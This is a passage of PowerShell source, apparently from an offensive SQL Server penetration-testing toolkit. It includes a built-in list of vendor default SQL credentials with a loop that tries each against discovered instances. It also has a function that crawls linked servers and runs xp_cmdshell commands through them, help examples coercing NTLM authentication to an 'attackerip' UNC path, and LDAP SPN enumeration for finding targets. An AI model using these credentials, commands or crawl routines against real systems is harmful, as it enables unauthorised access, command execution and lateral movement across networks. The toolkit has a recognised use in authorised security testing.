$TblResults.Columns.Add('Password') | Out-Null + $TblResults.Columns.Add('IsSysAdmin') | Out-Null + + # Create table for database of defaults + $DefaultPasswords = New-Object System.Data.DataTable + $DefaultPasswords.Columns.Add('Instance') | Out-Null + $DefaultPasswords.Columns.Add('Username') | Out-Null + $DefaultPasswords.Columns.Add('Password') | Out-Null + + # Populate DefaultPasswords data table + $DefaultPasswords.Rows.Add("ACS","ej","ej") | Out-Null + $DefaultPasswords.Rows.Add("ACT7","sa","sage") | Out-Null + $DefaultPasswords.Rows.Add("AOM2","admin","ca_admin") | out-null + $DefaultPasswords.Rows.Add("ARIS","ARIS9","*ARIS!1dm9n#") | out-null + $DefaultPasswords.Rows.Add("AutodeskVault","sa","AutodeskVault@26200") | Out-Null + $DefaultPasswords.Rows.Add("BOSCHSQL","sa","RPSsql12345") | Out-Null + $DefaultPasswords.Rows.Add("BPASERVER9","sa","AutoMateBPA9") | Out-Null + $DefaultPasswords.Rows.Add("CDRDICOM","sa","CDRDicom50!") | Out-Null + $DefaultPasswords.Rows.Add("CODEPAL","sa","Cod3p@l") | Out-Null + $DefaultPasswords.Rows.Add("CODEPAL08","sa","Cod3p@l") | Out-Null + $DefaultPasswords.Rows.Add("CounterPoint","sa","CounterPoint8") | Out-Null + $DefaultPasswords.Rows.Add("CSSQL05","ELNAdmin","ELNAdmin") | Out-Null + $DefaultPasswords.Rows.Add("CSSQL05","sa","CambridgeSoft_SA") | Out-Null + $DefaultPasswords.Rows.Add("CADSQL","CADSQLAdminUser","Cr41g1sth3M4n!") | Out-Null #Maybe a local windows account + $DefaultPasswords.Rows.Add("DHLEASYSHIP","sa","DHLadmin@1") | Out-Null + $DefaultPasswords.Rows.Add("DPM","admin","ca_admin") | out-null + $DefaultPasswords.Rows.Add("DVTEL","sa","") | Out-Null + $DefaultPasswords.Rows.Add("EASYSHIP","sa","DHLadmin@1") | Out-Null + $DefaultPasswords.Rows.Add("ECC","sa","Webgility2011") | Out-Null + $DefaultPasswords.Rows.Add("ECOPYDB","e+C0py2007_@x","e+C0py2007_@x") | Out-Null + $DefaultPasswords.Rows.Add("ECOPYDB","sa","ecopy") | Out-Null + $DefaultPasswords.Rows.Add("Emerson2012","sa","42Emerson42Eme") | Out-Null + $DefaultPasswords.Rows.Add("HDPS","sa","sa") | Out-Null + $DefaultPasswords.Rows.Add("HPDSS","sa","Hpdsdb000001") | Out-Null + $DefaultPasswords.Rows.Add("HPDSS","sa","hpdss") | Out-Null + $DefaultPasswords.Rows.Add("INSERTGT","msi","keyboa5") | Out-Null + $DefaultPasswords.Rows.Add("INSERTGT","sa","") | Out-Null + $DefaultPasswords.Rows.Add("INTRAVET","sa","Webster#1") | Out-Null + $DefaultPasswords.Rows.Add("MYMOVIES","sa","t9AranuHA7") | Out-Null + $DefaultPasswords.Rows.Add("PCAMERICA","sa","pcAmer1ca") | Out-Null + $DefaultPasswords.Rows.Add("PCAMERICA","sa","PCAmerica") | Out-Null + $DefaultPasswords.Rows.Add("PRISM","sa","SecurityMaster08") | Out-Null + $DefaultPasswords.Rows.Add("RMSQLDATA","Super","Orange") | out-null + $DefaultPasswords.Rows.Add("RTCLOCAL","sa","mypassword") | Out-Null + $DefaultPasswords.Rows.Add("RBAT","sa",'34TJ4@#$') | Out-Null + $DefaultPasswords.Rows.Add("RIT","sa",'34TJ4@#$') | Out-Null + $DefaultPasswords.Rows.Add("RCO","sa",'34TJ4@#$') | Out-Null + $DefaultPasswords.Rows.Add("REDBEAM","sa",'34TJ4@#$') | Out-Null + $DefaultPasswords.Rows.Add("SALESLOGIX","sa","SLXMaster") | Out-Null + $DefaultPasswords.Rows.Add("SIDEXIS_SQL","sa","2BeChanged") | Out-Null + $DefaultPasswords.Rows.Add("SQL2K5","ovsd","ovsd") | Out-Null + $DefaultPasswords.Rows.Add("SQLEXPRESS","admin","ca_admin") | out-null + #$DefaultPasswords.Rows.Add("SQLEXPRESS","gcs_client","SysGal.5560") | Out-Null #SA password = GCSsa5560 + #$DefaultPasswords.Rows.Add("SQLEXPRESS","gcs_web_client","SysGal.5560") | out-null #SA password = GCSsa5560 + #$DefaultPasswords.Rows.Add("SQLEXPRESS","NBNUser","NBNPassword") | out-null + $DefaultPasswords.Rows.Add("STANDARDDEV2014","test","test") | Out-Null + $DefaultPasswords.Rows.Add("TEW_SQLEXPRESS","tew","tew") | Out-Null + $DefaultPasswords.Rows.Add("vocollect","vocollect","vocollect") | Out-Null + $DefaultPasswords.Rows.Add("VSDOTNET","sa","") | Out-Null + $DefaultPasswords.Rows.Add("VSQL","sa","111") | Out-Null + $DefaultPasswords.Rows.Add("CASEWISE","sa","") | Out-Null + $DefaultPasswords.Rows.Add("VANTAGE","sa","vantage12!") | Out-Null + $DefaultPasswords.Rows.Add("BCM","bcmdbuser","Bcmuser@06") | Out-Null + $DefaultPasswords.Rows.Add("BCM","bcmdbuser","Numara@06") | Out-Null + $DefaultPasswords.Rows.Add("DEXIS_DATA","sa","dexis") | Out-Null + $DefaultPasswords.Rows.Add("DEXIS_DATA","dexis","dexis") | Out-Null + $DefaultPasswords.Rows.Add("SMTKINGDOM","SMTKINGDOM",'$ei$micMicro') | Out-Null + $DefaultPasswords.Rows.Add("RE7_MS","Supervisor",'Supervisor') | Out-Null + $DefaultPasswords.Rows.Add("RE7_MS","Admin",'Admin') | Out-Null + $DefaultPasswords.Rows.Add("OHD","sa",'ohdusa@123') | Out-Null + $DefaultPasswords.Rows.Add("UPC","serviceadmin",'Password.0') | Out-Null #Maybe a local windows account + $DefaultPasswords.Rows.Add("Hirsh","Velocity",'i5X9FG42') | Out-Null + $DefaultPasswords.Rows.Add("Hirsh","sa",'i5X9FG42') | Out-Null + $DefaultPasswords.Rows.Add("SPSQL","sa",'SecurityMaster08') | Out-Null + $DefaultPasswords.Rows.Add("CAREWARE","sa",'') | Out-Null + + $PwCount = $DefaultPasswords | measure | select count -ExpandProperty count + # Write-Verbose "Loaded $PwCount default passwords." + } + + Process + { + # Parse computer name from the instance + $ComputerName = Get-ComputerNameFromInstance -Instance $Instance + + # Default connection to local default instance + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Grab only the instance name + $TargetInstance = $Instance.Split("\")[1] + + # Bypass ports and default instances + if(-not $TargetInstance){ + Write-Verbose "$Instance : No named instance found." + return + } + + # Check if instance is in list + $TblResultsTemp = "" + $TblResultsTemp = $DefaultPasswords | Where-Object { $_.instance -eq "$TargetInstance"} + + if($TblResultsTemp){ + Write-Verbose "$Instance : Confirmed instance match." + }else{ + Write-Verbose "$Instance : No instance match found." + return + } + + # Test login + #Write-Verbose ($instance).ToString() + #Write-Verbose ($CurrentUsername).ToString() + #Write-Verbose ($CurrentPassword).ToString() + + # Grab and iterate username and password + for($i=0; $i -lt $TblResultsTemp.count; $i++){ + #Write-Verbose $TblResultsTemp + $CurrentUsername = $TblResultsTemp.username[$i] + $CurrentPassword = $TblResultsTemp.password[$i] + $LoginTest = Get-SQLServerInfo -Instance $instance -Username $CurrentUsername -Password $CurrentPassword -SuppressVerbose + if($LoginTest){ + + Write-Verbose "$Instance : Confirmed default credentials - $CurrentUsername/$CurrentPassword" + + $SysadminStatus = $LoginTest | select IsSysadmin -ExpandProperty IsSysadmin + + # Append if successful + $TblResults.Rows.Add( + $ComputerName, + $Instance, + $CurrentUsername, + $CurrentPassword, + $SysadminStatus + ) | Out-Null + }else{ + Write-Verbose "$Instance : No credential matches were found." + } + } + } + + End + { + # Return data + $TblResults + } +} + +Function Get-SQLServerLinkCrawl{ + <# + .SYNOPSIS + Get-SQLServerLinkCrawl attempts to enumerate and follow MSSQL database links. + .DESCRIPTION + Get-SQLServerLinkCrawl attempts to enumerate and follow MSSQL database links. The function enumerates database names, versions, and links, + and then enumerates the MSSQL user and the privileges that the link path has. + .EXAMPLE + Get-SQLServerLinkCrawl -Instance "servername\instancename" + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER Credential + Windows credentials. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER DAC + Dedicated Administrator Connection (DAC). + .PARAMETER TimeOut + Connection timeout. + .PARAMETER Query + Custom SQL query to run. If QueryTarget isn's given, this will run on each server. + PARAMETER QueryTarget + Link to run SQL query on. + .PARAMETER Export + Convert collected data to exportable format. + .Example + Crawl linked servers and return a list of databases for each one in a readable format. + Get-SQLServerLinkCrawl -instance "10.2.9.101\SQLSERVER2008" -username 'guest' -password 'guest' | where Instance -ne "Broken Link" | + foreach-object { Get-SQLQuery -instance "10.2.9.101\SQLSERVER2008" -username 'guest' -password 'guest' -Query (get-SQLServerLinkQuery -Path $_.Path -Sql 'select system_user')} + .Example + Crawl linked servers and return a list of databases for each one as datatable objects. + Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" + .Example + Crawl linked servers and return a list of databases for each one. and hide broken links. + Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" | where name -ne "Broken Link" | select name,version,path,links,user,sysadmin,customquery | format-table + .Example + Crawl linked servers, execute an OS command using xp_cmdshell, and return the results. + Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "exec master..xp_cmdshell 'whoami'" | format-table + .Example + Crawl linked servers, execute xp_dirtree, and return results. This can also be used to force the SQL Server to authenticate to an attacker using a UNC path. + Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree 'c:\temp'" -Export | format-table + Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "exec xp_dirtree '\\attackerip\file'" -Export | format-table + .Example + Crawl linked servers and return a list of databases for each one, then export to a to text objects for reporting. + Get-SQLServerLinkCrawl -instance "SQLSERVER1\Instance1" -Query "select name from master..sysdatabases" -Export | where name -ne "broken link" | sort name | Format-Table + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory=$false, + HelpMessage="SQL Server or domain account to authenticate with.")] + [string]$Username, + + [Parameter(Mandatory=$false, + HelpMessage="SQL Server or domain account password to authenticate with.")] + [string]$Password, + + [Parameter(Mandatory=$false, + HelpMessage="Windows credentials.")] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory=$false, + ValueFromPipelineByPropertyName=$true, + HelpMessage="SQL Server instance to connection to.")] + [string]$Instance, + + [Parameter(Mandatory=$false, + HelpMessage="Dedicated Administrator Connection (DAC).")] + [Switch]$DAC, + + [Parameter(Mandatory=$false, + HelpMessage="Connection timeout.")] + [int]$TimeOut = 2, + + [Parameter(Mandatory=$false, + HelpMessage="Custom SQL query to run. If QueryTarget isn's given, this will run on each server.")] + [string]$Query, + + [Parameter(Mandatory=$false, + HelpMessage="Link to run SQL query on.")] + [string]$QueryTarget, + + [Parameter(Mandatory=$false, + HelpMessage="Convert collected data to exportable format.")] + [switch]$Export, + + [Parameter(Mandatory=$false, + HelpMessage="Convert collected data to exportable format that is easier to work with.")] + [switch]$Export2 + ) + + Begin + { + $List = @() + + $Server = New-Object PSObject -Property @{ Instance=""; Version=""; Links=@(); Path=@(); User=""; Sysadmin=""; CustomQuery=""} + + $List += $Server + $SqlInfoTable = New-Object System.Data.DataTable + } + + Process + { + $i=1 + while($i){ + $i-- + foreach($Server in $List){ + if($Server.Instance -eq "") { + $List = (Get-SQLServerLinkData -list $List -server $Server -query $Query -QueryTarget $QueryTarget) + $i++ + + # Verbose output + Write-Verbose "--------------------------------" + Write-Verbose " Server: $($Server.Instance)" + Write-Verbose "--------------------------------" + Write-Verbose " - Link Path to server: $($Server.Path -join ' -> ')" + Write-Verbose " - Link Login: $($Server.User)" + Write-Verbose " - Link IsSysAdmin: $($Server.Sysadmin)" + Write-Verbose " - Link Count: $($Server.Links.Count)" + Write-Verbose " - Links on this server: $($Server.Links -join ', ')" + } + } + } + + # Return exportable format + if($Export){ + $LinkList = New-Object System.Data.Datatable + [void]$LinkList.Columns.Add("Instance") + [void]$LinkList.Columns.Add("Version") + [void]$LinkList.Columns.Add("Path") + [void]$LinkList.Columns.Add("Links") + [void]$LinkList.Columns.Add("User") + [void]$LinkList.Columns.Add("Sysadmin") + [void]$LinkList.Columns.Add("CustomQuery") + + foreach($Server in $List){ + [void]$LinkList.Rows.Add($Server.instance,$Server.version,$Server.path -join " -> ", $Server.links -join ",", $Server.user, $Server.Sysadmin, $Server.CustomQuery -join ",") + } + + return $LinkList + break + } + + # Return exportable format 2 + if($Export2){ + $LinkList = $List | + foreach { + [string]$StringLinkPath = "" + $Path = $_.path + $PathCount = $Path.count - 1 + $LinkSrc = $Path[$PathCount -1] + $LinkDes = $Path[$PathCount] + $LinkUser = $_.user + $LinkDesSysadmin = $_.Sysadmin + $Instance = $_.instance + $LinkDesVersion = $_.Version + $Path | + foreach { + if ( $StringLinkPath -eq ""){ + [string]$StringLinkPath = "$_" + }else{ + [string]$StringLinkPath = "$StringLinkPath -> $_" + } + } + $Object = New-Object PSObject + $Object | add-member Noteproperty LinkSrc $LinkSrc + $Object | add-member Noteproperty LinkName $LinkDes + $Object | add-member Noteproperty LinkInstance $Instance + $Object | add-member Noteproperty LinkUser $LinkUser + $Object | add-member Noteproperty LinkSysadmin $LinkDesSysadmin + $Object | add-member Noteproperty LinkVersion $LinkDesVersion + $Object | add-member Noteproperty LinkHops $PathCount + $Object | add-member Noteproperty LinkPath $StringLinkPath + $Object + } + + return $LinkList + break + } + + # Return powershell object (default) + $List + } + + End + { + } +} + +Function Get-SQLServerLinkData{ + [CmdletBinding()] + Param( + [Parameter(Mandatory=$true, + HelpMessage="Return the server objects identified during the server link crawl. Link crawling is done via theGet-SQLServerLinkCrawl function.")] + $List, + + [Parameter(Mandatory=$true, + HelpMessage="Server object to be tested")] + $Server, + + [Parameter(Mandatory=$false, + HelpMessage="Custom SQL query to run")] + $Query, + + [Parameter(Mandatory=$false, + HelpMessage="Target of custom SQL query to run")] + $QueryTarget + ) + + Begin + { + $SqlInfoQuery = "select @@servername as servername, @@version as version, system_user as linkuser, is_srvrolemember('sysadmin') as role" + $SqlLinksQuery = "select srvname from master..sysservers where dataaccess=1" + } + + Process + { + $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $SqlInfoQuery)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential + if($SqlInfoTable.Servername -ne $null){ + $Server.Instance = $SqlInfoTable.Servername + $Server.Version = [System.String]::Join("",(($SqlInfoTable.Version)[10..25])) + $Server.Sysadmin = $sqlInfoTable.role + $Server.User = $sqlInfoTable.linkuser + + if($List.Count -eq 1) { $Server.Path += ,$sqlInfoTable.servername } + + $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $SqlLinksQuery)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential + $Server.Links = [array]$SqlInfoTable.srvname + + if($Query -ne ""){ + if($QueryTarget -eq "" -or ($QueryTarget -ne "" -and $Server.Instance -eq $QueryTarget)){ + if($Query -like '*xp_cmdshell*'){ + $Query = $Query + " WITH RESULT SETS ((output VARCHAR(8000)))" + } + if($Query -like '*xp_dirtree*'){ + $Query = $Query + " WITH RESULT SETS ((output VARCHAR(8000), depth int))" + } + $SqlInfoTable = Get-SqlQuery -instance $Instance -Query ((Get-SQLServerLinkQuery -path $Server.Path -sql $Query)) -Timeout $Timeout -Username $UserName -Password $Password -Credential $Credential + if($Query -like '*WITH RESULT SETS*'){ + $Server.CustomQuery = $SqlInfoTable.output + } else { + $Server.CustomQuery = $SqlInfoTable + } + } + } + + if(($Server.Path | Sort-Object | Get-Unique).Count -eq ($Server.Path).Count){ + foreach($Link in $Server.Links){ + $Linkpath = $Server.Path + $Link + $List += ,(New-Object PSObject -Property @{ Instance=""; Version=""; Links=@(); Path=$Linkpath; User=""; Sysadmin=""; CustomQuery="" }) + } + } + } else { + $Server.Instance = "Broken Link" + } + return $List + } +} + +Function Get-SQLServerLinkQuery{ + [CmdletBinding()] + Param( + [Parameter(Mandatory=$false, + HelpMessage="SQL link path to crawl. This is used by Get-SQLServerLinkCrawl.")] + $Path=@(), + + [Parameter(Mandatory=$false, + HelpMessage="SQL query to build the crawl path around")] + $Sql, + + [Parameter(Mandatory=$false, + HelpMessage="Counter to determine how many single quotes needed")] + $Ticks=0 + + ) + if ($Path.length -le 1){ + return($Sql -replace "'", ("'"*[Math]::pow(2,$Ticks))) + } else { + return("select * from openquery(`""+$Path[1]+"`","+"'"*[Math]::pow(2,$Ticks)+ + (Get-SQLServerLinkQuery -path $Path[1..($Path.Length-1)] -sql $Sql -ticks ($Ticks+1))+"'"*[Math]::pow(2,$Ticks)+")") + } +} + + +# ---------------------------------- +# Test-FolderWriteAccess +# ---------------------------------- +# Author: Scott Sutherland +Function Test-FolderWriteAccess +{ + <# + .SYNOPSIS + Check if the current user has write access to a provided directory by creating a temp file and removing it. + .PARAMETER OutFolder + Output directory path. + .EXAMPLE + PS C:\> Test-FolderWriteAccess "c:\windows\system32" + False + .EXAMPLE + PS C:\> Test-FolderWriteAccess "$env:LOCALAPPDATA" + True + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Folder you would like to test write access to.')] + [string]$OutFolder + ) + + Process + { + # Create randomized 15 character file name + $WriteTestFile = (-join ((65..90) + (97..122) | Get-Random -Count 15 | % {[char]$_})) + + # Test Write Access + Try { + Write-Host "test" | Out-File "$OutFolder\$WriteTestFile" + rm "$OutFolder\$WriteTestFile" + return $true + }Catch{ + return $false + } + } +} +#endregion + +######################################################################### +# +#region DISCOVERY FUNCTIONS +# +######################################################################### + +# ------------------------------------------- +# Function: Get-DomainSpn +# ------------------------------------------- +# Author: Scott Sutherland +# Reference: http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx +function Get-DomainSpn +{ + <# + .SYNOPSIS + Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system + Note: This will use the default logon server by default. + .PARAMETER Username + Domain account to authenticate to Active Directory. + .PARAMETER Password + Domain password to authenticate to Active Directory. + .PARAMETER Credential + Domain credential to authenticate to Active Directory. + .PARAMETER DomainController + Domain controller to authenticated to. Requires username/password or credential. + .PARAMETER ComputerName + Computer name to filter for. + .PARAMETER DomainAccount + Domain account to filter for. + .PARAMETER SpnService + SPN service code to filter for. + .EXAMPLE + PS C:\temp> Get-DomainSpn -SpnService MSSQL | Select-Object -First 2 + + UserSid : 15000005210002431346712321821222048886811922073100 + User : SQLServer1$ + UserCn : SQLServer1 + Service : MSSQLSvc + ComputerName : SQLServer1.domain.local + Spn : MSSQLSvc/SQLServer1.domain.local:1433 + LastLogon : 6/24/2016 6:56 AM + Description : This is a SQL Server test instance using a local managed service account. + + UserSid : 15000005210002431346712321821222048886811922073101 + User : SQLServiceAccount + UserCn : SQLServiceAccount + Service : MSSQLSvc + ComputerName : SQLServer2.domain.local + Spn : MSSQLSvc/SQLServer2.domain.local:NamedInstance + LastLogon : 3/26/2016 3:43 PM + Description : This is a SQL Server test instance using a domain service account. + .EXAMPLE + PS C:\temp> Get-DomainSpn -DomainController 10.0.0.1 -Username Domain\User -Password Password123! + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'Domain user to authenticate with domain\user.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain password to authenticate with domain\user.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] + [string]$DomainController, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Computer name to filter for.')] + [string]$ComputerName, + + [Parameter(Mandatory = $false, + ValueFromPipeline = $true, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain account to filter for.')] + [string]$DomainAccount, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SPN service code.')] + [string]$SpnService, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + if(-not $SuppressVerbose) + { + Write-Verbose -Message 'Getting domain SPNs...' + } + + # Setup table to store results + $TableDomainSpn = New-Object -TypeName System.Data.DataTable + $null = $TableDomainSpn.Columns.Add('UserSid') + $null = $TableDomainSpn.Columns.Add('User') + $null = $TableDomainSpn.Columns.Add('UserCn') + $null = $TableDomainSpn.Columns.Add('Service') + $null = $TableDomainSpn.Columns.Add('ComputerName') + $null = $TableDomainSpn.Columns.Add('Spn') + $null = $TableDomainSpn.Columns.Add('LastLogon') + $null = $TableDomainSpn.Columns.Add('Description') + $TableDomainSpn.Clear() + } + + Process + { + + try + { + # Setup LDAP filter + $SpnFilter = '' + + if($DomainAccount) + { + $SpnFilter = "(objectcategory=person)(SamAccountName=$DomainAccount)" + } + + if($ComputerName) + { + $ComputerSearch = "$ComputerName`$" + $SpnFilter = "(objectcategory=computer)(SamAccountName=$ComputerSearch)" + } + + # Get results + $SpnResults = Get-DomainObject -LdapFilter "(&(servicePrincipalName=$SpnService*)$SpnFilter)" -DomainController $DomainController -Username $Username -Password $Password -Credential $Credential + + # Parse results + $SpnResults | ForEach-Object -Process { + [string]$SidBytes = [byte[]]"$($_.Properties.objectsid)".split(' ') + [string]$SidString = $SidBytes -replace ' ', '' + #$Spn = $_.properties.serviceprincipalname[0].split(',') + + #foreach ($item in $Spn) + foreach ($item in $($_.properties.serviceprincipalname)) + { + # Parse SPNs + $SpnServer = $item.split('/')[1].split(':')[0].split(' ')[0] + $SpnService = $item.split('/')[0] + + # Parse last logon + if ($_.properties.lastlogon) + { + $LastLogon = [datetime]::FromFileTime([string]$_.properties.lastlogon).ToString('g') + } + else + { + $LastLogon = '' + } + + # Add results to table + $null = $TableDomainSpn.Rows.Add( + [string]$SidString, + [string]$_.properties.samaccountname, + [string]$_.properties.cn, + [string]$SpnService, + [string]$SpnServer, + [string]$item, + $LastLogon, + [string]$_.properties.description + ) + } + } + } + catch + { + "Error was $_" + $line = $_.InvocationInfo.ScriptLineNumber + "Error was in Line $line" + } + } + + End + { + # Check for results + if ($TableDomainSpn.Rows.Count -gt 0) + { + $TableDomainSpnCount = $TableDomainSpn.Rows.Count + if(-not $SuppressVerbose) + { + Write-Verbose -Message "$TableDomainSpnCount SPNs found on servers that matched search criteria." + } + Return $TableDomainSpn + } + else + { + Write-Verbose -Message '0 SPNs found.' + } + } +} + + +# ------------------------------------------- +# Function: Get-DomainObject +# ------------------------------------------- +# Author: Will Schroeder +# Modifications: Scott Sutherland +function Get-DomainObject +{ + <# + .SYNOPSIS + Used to query domain controllers via LDAP. Supports alternative credentials from non-domain system + Note: This will use the default logon server by default. + .PARAMETER Username + Domain account to authenticate to Active Directory. + .PARAMETER Password + Domain password to authenticate to Active Directory. + .PARAMETER Credential + Domain credential to authenticate to Active Directory. + .PARAMETER DomainController + Domain controller to authenticated to. Requires username/password or credential. + .PARAMETER LdapFilter + LDAP filter. + .PARAMETER LdapPath + Ldap path. + .PARAMETER $Limit + Maximum number of Objects to pull from AD, limit is 1,000.". + .PARAMETER SearchScope + Scope of a search as either a base, one-level, or subtree search, default is subtree.. + .EXAMPLE + PS C:\temp> Get-DomainObject -LdapFilter "(&(servicePrincipalName=*))" + .EXAMPLE + PS C:\temp> Get-DomainObject -LdapFilter "(&(servicePrincipalName=*))" -DomainController 10.0.0.1:389 + It will use the security context of the current process to authenticate to the domain controller. + IP:Port can be specified to reach a pivot machine. + .EXAMPLE + PS C:\temp> Get-DomainObject -LdapFilter "(&(servicePrincipalName=*))" -DomainController 10.0.0.1 -Username Domain\User -Password Password123! + .Notes + This was based on Will Schroeder's Get-ADObject function from https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerView/powerview.ps1 + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'Domain user to authenticate with domain\user.')] + [string]$Username, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain password to authenticate with domain\user.')] + [string]$Password, + + [Parameter(Mandatory = $false, + HelpMessage = 'Credentials to use when connecting to a Domain Controller.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain controller for Domain and Site that you want to query against.')] + [string]$DomainController, + + [Parameter(Mandatory = $false, + HelpMessage = 'LDAP Filter.')] + [string]$LdapFilter = '', + + [Parameter(Mandatory = $false, + HelpMessage = 'LDAP path.')] + [string]$LdapPath, + + [Parameter(Mandatory = $false, + HelpMessage = 'Maximum number of Objects to pull from AD, limit is 1,000 .')] + [int]$Limit = 1000, + + [Parameter(Mandatory = $false, + HelpMessage = 'scope of a search as either a base, one-level, or subtree search, default is subtree.')] + [ValidateSet('Subtree','OneLevel','Base')] + [string]$SearchScope = 'Subtree' + ) + Begin + { + # Create PS Credential object + if($Username -and $Password) + { + $secpass = ConvertTo-SecureString $Password -AsPlainText -Force + $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList ($Username, $secpass) + } + + # Create Create the connection to LDAP + if ($DomainController) + { + + # Test credentials and grab domain + try { + + $ArgumentList = New-Object Collections.Generic.List[string] + $ArgumentList.Add("LDAP://$DomainController") + + if($Username){ + $ArgumentList.Add($Credential.UserName) + $ArgumentList.Add($Credential.GetNetworkCredential().Password) + } + + $objDomain = (New-Object -TypeName System.DirectoryServices.DirectoryEntry -ArgumentList $ArgumentList).distinguishedname + + # Authentication failed. distinguishedName property can not be empty. + if(-not $objDomain){ throw } + + }catch{ + Write-Host "Authentication failed or domain controller is not reachable." + Break + } + + # add ldap path + if($LdapPath) + { + $LdapPath = '/'+$LdapPath+','+$objDomain + $ArgumentList[0] = "LDAP://$DomainController$LdapPath" + } + + $objDomainPath= New-Object System.DirectoryServices.DirectoryEntry -ArgumentList $ArgumentList + + $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher $objDomainPath + } + else + { + $objDomain = ([ADSI]'').distinguishedName + + # add ldap path + if($LdapPath) + { + $LdapPath = $LdapPath+','+$objDomain + $objDomainPath = [ADSI]"LDAP://$LdapPath" + } + else + { + $objDomainPath = [ADSI]'' + } + + $objSearcher = New-Object -TypeName System.DirectoryServices.DirectorySearcher -ArgumentList $objDomainPath + } + + # Setup LDAP filter + $objSearcher.PageSize = $Limit + $objSearcher.Filter = $LdapFilter + $objSearcher.SearchScope = 'Subtree' + } + + Process + { + try + { + # Return object + $objSearcher.FindAll() | ForEach-Object -Process { + $_ + } + } + catch + { + "Error was $_" + $line = $_.InvocationInfo.ScriptLineNumber + "Error was in Line $line" + } + } + + End + { + } +} + +# ------------------------------------------- +# Function: Get-SQLInstanceDomain +# ------------------------------------------- +# Author: Scott Sutherland +Function Get-SQLInstanceDomain +{ + <# + .SYNOPSIS + Returns a list of SQL Server instances discovered by querying a domain controller for systems with registered MSSQL service principal names. + The function will default to the current user's domain and logon server, but an alternative domain controller can be provided. + UDP scanning of management servers is optional. + .PARAMETER Username + Domain user to authenticate with domain\user. + .PARAMETER Password + Domain password to authenticate with domain\user. + .PARAMETER Credential + Credentials to use when connecting to a Domain Controller. + .PARAMETER DomainController + Domain controller for Domain and Site that you want to query against. Only used when username/password or credential is provided. + .PARAMETER ComputerName + Domain computer name to filter for. + .PARAMETER DomainAccount + Domain account to filter for. + .PARAMETER CheckMgmt + Performs UDP scan of servers with registered MSServerClusterMgmtAPI SPNs to help find additional SQL Server instances. + .PARAMETER UDPTimeOut + Timeout in seconds for UDP scans of management servers. Longer timeout = more accurate. + .EXAMPLE + PS C:\> Get-SQLInstanceDomain -Verbose + VERBOSE: Grabbing SQL Server SPNs from domain... + VERBOSE: Getting domain SPNs... + VERBOSE: Parsing SQL Server instances from SPNs... + VERBOSE: 35 instances were found. + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com + DomainAccountSid : 1500000521000123456712921821222049996811922123456 + DomainAccount : SQLServer1$ + DomainAccountCn : SQLServer1 + Service : MSSQLSvc + Spn : MSSQLSvc/SQLServer1.domain.com + LastLogon : 6/22/2016 9:00 AM + [TRUNCATED] + .EXAMPLE + PS C:\> Get-SQLInstanceDomain -Verbose -CheckMgmt + PS C:\> Get-SQLInstanceDomain -Verbose + VERBOSE: Grabbing SQL Server SPNs from domain... + VERBOSE: Getting domain SPNs... + VERBOSE: Parsing SQL Server instances from SPNs... + VERBOSE: 35 instances were found. + VERBOSE: Getting domain SPNs... + VERBOSE: 10 SPNs found on servers that matched search criteria. + VERBOSE: Performing a UDP scan of management servers to obtain managed SQL Server instances... + VERBOSE: - MServer1.domain.com - UDP Scan Start. + VERBOSE: - MServer1.domain.com - UDP Scan Complete. + + ComputerName : SQLServer1.domain.com + Instance : SQLServer1.domain.com + DomainAccountSid : 1500000521000123456712921821222049996811922123456 + DomainAccount : SQLServer1$ + DomainAccountCn : SQLServer1 + Service : MSSQLSvc + Spn : MSSQLSvc/SQLServer1.domain.com + LastLogon : 6/22/2016 9:00 AM + [TRUNCATED] + .EXAMPLE + PS C:\> Get-SQLInstanceDomain -DomainController 10.10.10.1 -Username domain\user -Password SecretPassword123! + VERBOSE: Grabbing SQL Server SPNs from domain... + VERBOSE: Getting domain SPNs... + VERBOSE: Parsing SQL Server instances from SPNs... + 